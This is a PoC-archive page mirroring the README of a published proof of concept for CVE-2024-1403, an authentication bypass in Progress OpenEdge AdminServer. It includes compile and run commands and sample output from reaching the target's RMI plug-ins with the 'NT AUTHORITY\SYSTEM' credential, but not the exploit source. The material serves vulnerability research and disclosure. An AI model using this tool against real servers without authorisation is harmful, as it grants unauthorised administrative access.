Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-1403 PoC — Authentication Bypass in OpenEdge Authentication Gateway and AdminServer

Source
https://github.com/horizon3ai/CVE-2024-1403
Associated Vulnerability
Title:Authentication Bypass in OpenEdge Authentication Gateway and AdminServer (CVE-2024-1403)
Description:In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified.  The vulnerability is a bypass to authentication based on a failure to properly handle username and password. Certain unexpected content passed into the credentials can lead to unauthorized access without proper authentication.  
Description
Progress OpenEdge Authentication Bypass
Readme
# CVE-2024-1403 Progress OpenEdge Authentication Bypass
An exploit proof of concept for Progress OpenEdge CVE-2024-1403.

## Blog Post
More details here:
[https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive](https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive)

## Usage
You must provide your own versions of the following jars:
- `progress.jar`
- `oeauth-12.8.-.jar`
- `osmetrics.jar`
- `juniper.jar`

### Compilation
```
$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java

```
### Usage
Running this script will attempt to connect to the `AdminServer` RMI interface using the `NT AUTHORITY\SYSTEM` credential.
```
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.agent.database.IAgentPlugIn

com.progress.ubroker.tools.NSRemoteObject
	com.progress.chimera.common.IChimeraHierarchy
	com.progress.ubroker.tools.IYodaRMI
	com.progress.ubroker.tools.IYodaSharedResources

com.progress.ubroker.tools.UBRemoteCommand
	com.progress.chimera.common.IChimeraRemoteCommand

com.progress.juniper.admin.JAPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.juniper.admin.IJAPlugIn

com.progress.agent.smdatabase.SMPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
```

## Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
*  [Horizon3 Attack Team](https://twitter.com/Horizon3Attack)
*  [James Horseman](https://twitter.com/JamesHorseman2)
*  [Zach Hanley](https://twitter.com/hacks_zach)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/712a453968d563cbbf99f3bece9f8e2db7009a42
├── [1.6K]  Main.java
└── [2.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →